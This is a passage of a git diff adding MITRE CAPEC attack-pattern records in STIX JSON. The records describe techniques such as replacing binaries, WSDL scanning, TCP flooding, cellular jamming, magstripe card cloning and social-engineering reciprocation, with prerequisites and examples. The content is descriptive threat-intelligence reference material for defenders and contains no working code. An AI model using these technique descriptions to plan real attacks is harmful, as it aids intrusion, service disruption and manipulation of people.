[ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--1fa1539d-4a13-4453-bf43-ad0987b2fbf5" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n For example, servers may assume that clients will accurately compute values (such as prices), will send correctly structured messages, and will attempt to ensure efficient interactions with the server. By reverse-engineering a client and creating their own version, an adversary can take advantage of these assumptions to abuse service functionality.\n For example, a purchasing service might send a unit price to its client and expect the client to correctly compute the total cost of a purchase. If the adversary uses a malicious client, however, the adversary could ignore the server input and declare any total price. Likewise, an adversary could configure the client to retain network or other server resources for longer than legitimately necessary in order to degrade server performance. Even services with general clients can be susceptible to this attack if they assume certain client behaviors. However, such services generally can make fewer assumptions about the behavior of their clients in the first place and, as such, are less likely to make assumptions that an adversary can exploit.\n ", + "x_capec_prerequisites": [ + "The targeted service must make assumptions about the behavior of the client application that interacts with it, which can be abused by an adversary." + ], + "x_capec_resources_required": [ + "The adversary must be able to reverse engineer a client of the targeted service. However, the adversary does not need to reverse engineer all client functionality - they only need to recreate enough of the functionality to access the desired server functionality." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--15e6b769-4cbd-4c39-b774-b45673fd55de.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--15e6b769-4cbd-4c39-b774-b45673fd55de.json new file mode 100644 index 0000000000000000000000000000000000000000..335ff24a766967c4086e4ec846ee430c57174bb2 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--15e6b769-4cbd-4c39-b774-b45673fd55de.json @@ -0,0 +1,71 @@ +{ + "id": "bundle--ef8c49cf-e55a-49fb-8326-cc9152c6f886", + "objects": [ + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Adversaries know that certain binaries will be regularly executed as part of normal processing. If these binaries are not protected with the appropriate file system permissions, it could be possible to replace them with malware. This malware might be executed at higher system permission levels. A variation of this pattern is to discover self-extracting installation packages that unpack binaries to directories with weak file permissions which it does not clean up appropriately. These binaries can be replaced by malware, which can then be executed.", + "external_references": [ + { + "external_id": "CAPEC-642", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/642.html" + }, + { + "external_id": "CWE-732", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/732.html" + }, + { + "description": "Server Software Component: Terminal Services DLL", + "external_id": "T1505.005", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1505/005" + }, + { + "description": "Compromise Client Software Binary", + "external_id": "T1554", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1554" + }, + { + "description": "Hijack Execution Flow:Executable Installer File Permissions Weakness", + "external_id": "T1574.005", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1574/005" + }, + { + "description": "Binary planting", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Binary_planting" + } + ], + "id": "attack-pattern--15e6b769-4cbd-4c39-b774-b45673fd55de", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Replace Binaries", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--9ad2c2eb-9939-4590-9683-2e789692d262" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "The installer for a previous version of Firefox would use a DLL maliciously placed in the default download directory instead of the existing DLL located elsewhere, probably due to DLL hijacking. This DLL would be run with administrator privileges if the installer has those privileges.", + "By default, the Windows screensaver application SCRNSAVE.exe leverages the scrnsave.scr Portable Executable (PE) file in C:\\Windows\\system32\\. This value is set in the registry at HKEY_CURRENT_USER\\Control Panel\\Desktop, which can be modified by an adversary to instead point to a malicious program. This program would then run any time the SCRNSAVE.exe program is activated and with administrator privileges. An adversary may additionally modify other registry values within the same location to set the SCRNSAVE.exe program to run more frequently." + ], + "x_capec_prerequisites": [ + "The attacker must be able to place the malicious binary on the target machine." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--165b75a3-3e50-492c-8f1a-af979dc5af12.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--165b75a3-3e50-492c-8f1a-af979dc5af12.json new file mode 100644 index 0000000000000000000000000000000000000000..f4cf798be70c0f5544477610c579a179b49ccda3 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--165b75a3-3e50-492c-8f1a-af979dc5af12.json @@ -0,0 +1,72 @@ +{ + "id": "bundle--9c10c49d-c009-4050-98c7-d37d1dfff80f", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets the WSDL interface made available by a web service. The attacker may scan the WSDL interface to reveal sensitive information about invocation patterns, underlying technology implementations and associated vulnerabilities. This type of probing is carried out to perform more serious attacks (e.g. parameter tampering, malicious content injection, command injection, etc.). WSDL files provide detailed information about the services ports and bindings available to consumers. For instance, the attacker can submit special characters or malicious content to the Web service and can cause a denial of service condition or illegal access to database records. In addition, the attacker may try to guess other private methods by using the information provided in the WSDL files.", + "external_references": [ + { + "external_id": "CAPEC-95", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/95.html" + }, + { + "external_id": "CWE-538", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/538.html" + }, + { + "description": "Walid Negm, Anatomy of a Web Services Attack, 2004--03---01, ForumSystems", + "external_id": "REF-554", + "source_name": "reference_from_CAPEC", + "url": "https://www.forumsys.com/wp-content/uploads/2014/01/Anatomy-of-a-Web-Services-Attack.pdf" + }, + { + "description": "Frank Coyle, Seven Steps to XML Mastery, 2006--08---25", + "external_id": "REF-555", + "source_name": "reference_from_CAPEC", + "url": "http://www.informit.com/articles/article.aspx?p=601349" + } + ], + "id": "attack-pattern--165b75a3-3e50-492c-8f1a-af979dc5af12", + "modified": "2021-10-21T00:00:00.000Z", + "name": "WSDL Scanning", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--49132d37-44e8-458c-a06e-0e5b9ac9bbd6" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "A WSDL interface may expose a function vulnerable to SQL Injection.", + "\n The Web Services Description Language (WSDL) allows a web service to advertise its capabilities by describing operations and parameters needed to access the service. As discussed in step 5 of this series, WSDL is often generated automatically, using utilities such as Java2WSDL, which takes a class or interface and builds a WSDL file in which interface methods are exposed as web services.\n Because WSDL generation often is automated, enterprising adversaries can use WSDL to gain insight into the both public and private services. For example, an organization converting legacy application functionality to a web services framework may inadvertently pass interfaces not intended for public consumption to a WSDL generation tool. The result will be SOAP interfaces that give access to private methods.\n Another, more subtle WSDL attack occurs when an enterprising attacker uses naming conventions to guess the names of unpublished methods that may be available on the server. For example, a service that offers a stock quote and trading service may publish query methods such as requestStockQuote in its WSDL. However, similar unpublished methods may be available on the server but not listed in the WSDL, such as executeStockQuote. A persistent adversary with time and a library of words and phrases can cycle thru common naming conventions (get, set, update, modify, and so on) to discover unpublished application programming interfaces that open doors into private data and functionality.\n Source : \"Seven Steps to XML Mastery, Step 7: Ensure XML Security\", Frank Coyle. See reference section.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Scan for WSDL Documents: The adversary scans for WSDL documents. The WDSL document written in XML is like a handbook on how to communicate with the web services provided by the target host. It provides an open view of the application (function details, purpose, functional break down, entry points, message types, etc.). This is very useful information for the adversary.

Experiment

  1. Analyze WSDL files: An adversary will analyze the WSDL files and try to find potential weaknesses by sending messages matching the pattern described in the WSDL file. The adversary could run through all of the operations with different message request patterns until a breach is identified.

Exploit

  1. Craft malicious content: Once an adversary finds a potential weakness, they can craft malicious content to be sent to the system. For instance the adversary may try to submit special characters and observe how the system reacts to an invalid request. The message sent by the adversary may not be XML validated and cause unexpected behavior.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "A client program connecting to a web service can read the WSDL to determine what functions are available on the server.", + "The target host exposes vulnerable functions within its WSDL interface." + ], + "x_capec_skills_required": { + "Low": "This attack can be as simple as reading WSDL and starting sending invalid request.", + "Medium": "This attack can be used to perform more sophisticated attacks (SQL injection, etc.)" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--172e2289-333b-4796-9afd-94140c9480e8.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--172e2289-333b-4796-9afd-94140c9480e8.json new file mode 100644 index 0000000000000000000000000000000000000000..5d42f088a03086187dfbe71a30c61a0474b1b4ff --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--172e2289-333b-4796-9afd-94140c9480e8.json @@ -0,0 +1,62 @@ +{ + "id": "bundle--bc4417a0-296b-4fed-bff5-4bc10056f684", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary may execute a flooding attack using the TCP protocol with the intent to deny legitimate users access to a service. These attacks exploit the weakness within the TCP protocol where there is some state information for the connection the server needs to maintain. This often involves the use of TCP SYN messages.", + "external_references": [ + { + "external_id": "CAPEC-482", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/482.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "description": "Network Denial of Service: Direct Network Flood", + "external_id": "T1498.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1498/001" + }, + { + "description": "Endpoint Denial of Service: OS Exhaustion Flood", + "external_id": "T1499.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1499/001" + }, + { + "description": "Endpoint Denial of Service: Service Exhaustion Flood", + "external_id": "T1499.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1499/002" + } + ], + "id": "attack-pattern--172e2289-333b-4796-9afd-94140c9480e8", + "modified": "2022-09-29T00:00:00.000Z", + "name": "TCP Flood", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--6854fe89-0829-429f-a95c-89e77ab6c8ed" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "This type of an attack requires the ability to generate a large amount of TCP traffic to send to the target port of a functioning server." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--17593c9a-d8a0-4ef3-8da1-9d948426bbb8.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--17593c9a-d8a0-4ef3-8da1-9d948426bbb8.json new file mode 100644 index 0000000000000000000000000000000000000000..c8d8f6071f13a07270993f3695745e4ac16879f2 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--17593c9a-d8a0-4ef3-8da1-9d948426bbb8.json @@ -0,0 +1,47 @@ +{ + "id": "bundle--b4549fe8-9c10-4504-b5b4-df4883b93d32", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack scenario, the attacker actively transmits signals to overpower and disrupt the communication between a cellular user device and a cell tower. Several existing techniques are known in the open literature for this attack for 2G, 3G, and 4G LTE cellular technology. For example, some attacks target cell towers by overwhelming them with false status messages, while others introduce high levels of noise on signaling channels.", + "external_references": [ + { + "external_id": "CAPEC-605", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/605.html" + } + ], + "id": "attack-pattern--17593c9a-d8a0-4ef3-8da1-9d948426bbb8", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Cellular Jamming", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--7534fc4c-f683-4918-8f62-005e0402d18a" + ], + "x_capec_consequences": { + "Availability": [ + "Resource Consumption (The attacker's goal is to prevent users from accessing the cellular network. Denying connectivity to the cellular network prevents the user from being able to transmit or receive any data, which also prevents VOIP calls, however this attack poses no threat to data confidentiality.)" + ] + }, + "x_capec_domains": [ + "Communications" + ], + "x_capec_prerequisites": [ + "Lack of anti-jam features in cellular technology (2G, 3G, 4G, LTE)" + ], + "x_capec_skills_required": { + "Low": "This attack can be performed by low capability attackers with commercially available tools." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--177d22be-7b76-4726-8085-61756f95c0ce.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--177d22be-7b76-4726-8085-61756f95c0ce.json new file mode 100644 index 0000000000000000000000000000000000000000..05b6367e348170755da3c8406d5cb440de9c3308 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--177d22be-7b76-4726-8085-61756f95c0ce.json @@ -0,0 +1,43 @@ +{ + "id": "bundle--15639fd9-af33-48dd-9bcc-b8d5a760faa8", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker is able to discover and query Micro-services at a web location and thereby expose the Micro-services to further exploitation by gathering information about their implementation and function. Micro-services in web pages allow portions of a page to connect to the server and update content without needing to cause the entire page to update. This allows user activity to change portions of the page more quickly without causing disruptions elsewhere.", + "external_references": [ + { + "external_id": "CAPEC-179", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/179.html" + } + ], + "id": "attack-pattern--177d22be-7b76-4726-8085-61756f95c0ce", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Calling Micro-Services Directly", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--ec382da0-af49-489b-bca1-a555d48b7ce3" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n However, these micro-services may not be subject to the same level of security review as other forms of content. For example, a micro-service that posts requests to a server that are turned into SQL queries may not adequately protect against SQL-injection attacks. As a result, micro-services may provide another vector for a range of attacks. It should be emphasized that the presence of micro-services does not necessarily make a site vulnerable to attack, but they do provide additional complexity to a web page and therefore may contain vulnerabilities that support other attack patterns.\n ", + "x_capec_prerequisites": [ + "The target site must use micro-services that interact with the server and one or more of these micro-services must be vulnerable to some other attack pattern." + ], + "x_capec_resources_required": [ + "The attacker usually needs to be able to invoke micro-services directly in order to control the parameters that are used in their attack. The attacker may require other resources depending on the nature of the flaw in the targeted micro-service." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1809fa36-f249-4e55-80ab-26570fd24cab.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1809fa36-f249-4e55-80ab-26570fd24cab.json new file mode 100644 index 0000000000000000000000000000000000000000..637699b6e07bd9bb81659e84b32098b50b3c6d2c --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1809fa36-f249-4e55-80ab-26570fd24cab.json @@ -0,0 +1,41 @@ +{ + "id": "bundle--bc074c31-11b3-4019-89c2-cdddfde0a8c9", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Data Interchange Protocols are used to transmit structured data between entities. These protocols are often specific to a particular domain (B2B: purchase orders, invoices, transport logistics and waybills, medical records). They are often, but not always, XML-based. Subverting the protocol can allow an adversary to impersonate others, discover sensitive information, control the outcome of a session, or perform other attacks. This type of attack targets invalid assumptions that may be inherent in implementers of the protocol, incorrect implementations of the protocol, or vulnerabilities in the protocol itself.", + "external_references": [ + { + "external_id": "CAPEC-277", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/277.html" + }, + { + "external_id": "CWE-707", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html" + } + ], + "id": "attack-pattern--1809fa36-f249-4e55-80ab-26570fd24cab", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Data Interchange Protocol Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--2166d3c5-baec-4f42-8284-c1b5b649ad34" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--180aa01f-65a0-4400-a174-7b0f1605db0c.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--180aa01f-65a0-4400-a174-7b0f1605db0c.json new file mode 100644 index 0000000000000000000000000000000000000000..923bad1e588fc514d2175b637bb06e98aaf5e26f --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--180aa01f-65a0-4400-a174-7b0f1605db0c.json @@ -0,0 +1,71 @@ +{ + "id": "bundle--a3d4d381-5d33-4cd7-af19-f7c2ae896b90", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses a social engineering techniques to produce a sense of obligation in the target to perform a certain action or concede some sensitive or key piece of information. Obligation has to do with actions one feels they need to take due to some sort of social, legal, or moral requirement, duty, contract, or promise. There are various techniques for fostering a sense of obligation to reciprocate or concede during ordinary modes of communication. One method is to compliment the target, and follow up the compliment with a question. If performed correctly the target may volunteer a key piece of information, sometimes involuntarily.", + "external_references": [ + { + "external_id": "CAPEC-418", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/418.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + }, + { + "description": "Social Engineering: The Art of Human Hacking, 2010, Wiley", + "external_id": "REF-360", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--180aa01f-65a0-4400-a174-7b0f1605db0c", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Influence Perception of Reciprocation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--af1a9e65-4ca7-4551-b1de-6192539652c5" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Attacks that influence the perception of the target can result in a wide variety of consequences and negatively affect potentially the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Confidentiality": [ + "Other (Attacks that influence the perception of the target can result in a wide variety of consequences and negatively affect potentially the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Integrity": [ + "Other (Attacks that influence the perception of the target can result in a wide variety of consequences and negatively affect potentially the confidentiality, availability, and/or integrity of an application or system.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_example_instances": [ + "An adversary develops a relationship with the target to foster a feeling of obligation in them to perform a certain action or concede some information. A perception of obligation/concession means that the target feels they need to behave in some way or perform some sort of action due to being morally or legally bound to do so." + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with the target in some manner." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "The adversary requires strong inter-personal and communication skills." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--19015961-475c-438b-887b-e3d66a9143de.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--19015961-475c-438b-887b-e3d66a9143de.json new file mode 100644 index 0000000000000000000000000000000000000000..63798562c3c6f5b0e25331d1328e4f87ba46b6b1 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--19015961-475c-438b-887b-e3d66a9143de.json @@ -0,0 +1,40 @@ +{ + "id": "bundle--15c89f5b-ebb2-4b03-9583-bc25be44b7d2", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker duplicates the data on a Magnetic strip card (i.e. 'swipe card' or 'magstripe') to gain unauthorized access to a physical location or a person's private information. Magstripe cards encode data on a band of iron-based magnetic particles arrayed in a stripe along a rectangular card. Most magstripe card data formats conform to ISO standards 7810, 7811, 7813, 8583, and 4909. The primary advantage of magstripe technology is ease of encoding and portability, but this also renders magnetic strip cards susceptible to unauthorized duplication. If magstripe cards are used for access control, all an attacker need do is obtain a valid card long enough to make a copy of the card and then return the card to its location (i.e. a co-worker's desk). Magstripe reader/writers are widely available as well as software for analyzing data encoded on the cards. By swiping a valid card, it becomes trivial to make any number of duplicates that function as the original.", + "external_references": [ + { + "external_id": "CAPEC-397", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/397.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--19015961-475c-438b-887b-e3d66a9143de", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Cloning Magnetic Strip Cards", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--5e808864-44b1-478c-8cb0-75c55cd51e2b" + ], + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7.json new file mode 100644 index 0000000000000000000000000000000000000000..af60b5f4079be9b8addeae8017ddbebef2aaa9ff --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7.json @@ -0,0 +1,104 @@ +{ + "id": "bundle--6e9c1fe3-e66c-4995-9ff8-c4b1401d7795", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary who is authorized or has the ability to search known system resources, does so with the intention of gathering useful information. System resources include files, memory, and other aspects of the target system. In this pattern of attack, the adversary does not necessarily know what they are going to find when they start pulling data. This is different than CAPEC-150 where the adversary knows what they are looking for due to the common location.", + "external_references": [ + { + "external_id": "CAPEC-545", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/545.html" + }, + { + "external_id": "CWE-1239", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1239.html" + }, + { + "external_id": "CWE-1243", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1243.html" + }, + { + "external_id": "CWE-1258", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1258.html" + }, + { + "external_id": "CWE-1266", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1266.html" + }, + { + "external_id": "CWE-1272", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1272.html" + }, + { + "external_id": "CWE-1278", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1278.html" + }, + { + "external_id": "CWE-1323", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1323.html" + }, + { + "external_id": "CWE-1258", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1258.html" + }, + { + "external_id": "CWE-1330", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1330.html" + }, + { + "description": "Data from Local System", + "external_id": "T1005", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1005" + }, + { + "description": "Credentials from Password Stores:Keychain", + "external_id": "T1555.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1555/001" + } + ], + "id": "attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Pull Data from System Resources", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "attack-pattern--9d08b257-08f6-42e3-ad7e-41aaf07789a1", + "attack-pattern--056a463d-6303-438e-a43f-992cee52fb95" + ], + "x_capec_child_of_refs": [ + "attack-pattern--913426fa-ea1f-43b0-8492-1d363ea109d6" + ], + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--1b75b059-c9ee-4c4d-b016-bafb20cce96b", + "attack-pattern--ed3de4d7-a053-42e4-9f3d-3a6293034e96", + "attack-pattern--a7ed6b37-4ede-4c34-bbb2-c422fb844d74", + "attack-pattern--9a7492fa-b46e-48bc-aae9-beb1d359171e" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1995c522-a25d-46e4-b024-65172771a692.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1995c522-a25d-46e4-b024-65172771a692.json new file mode 100644 index 0000000000000000000000000000000000000000..bcb7bc5a8947ed56999dde6eeb81bdbbacedc4bd --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1995c522-a25d-46e4-b024-65172771a692.json @@ -0,0 +1,83 @@ +{ + "id": "bundle--41c61492-899a-41f1-bda4-441b9c4df2e8", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary, through a previously installed malicious application, impersonates an expected or routine task in an attempt to steal sensitive information or leverage a user's privileges.", + "external_references": [ + { + "external_id": "CAPEC-504", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/504.html" + }, + { + "external_id": "CWE-1021", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1021.html" + }, + { + "description": "Masquerading: Masquerade Task or Service", + "external_id": "T1036.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1036/004" + }, + { + "description": "Adrienne Porter Felt, David Wagner, Phishing on Mobile Devices, 2011, University of California, Berkeley", + "external_id": "REF-434", + "source_name": "reference_from_CAPEC", + "url": "https://people.eecs.berkeley.edu/~daw/papers/mobphish-w2sp11.pdf" + } + ], + "id": "attack-pattern--1995c522-a25d-46e4-b024-65172771a692", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Task Impersonation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--fc3a9a6f-66c9-4363-8ebd-9bd18725fff8" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "An adversary monitors the system 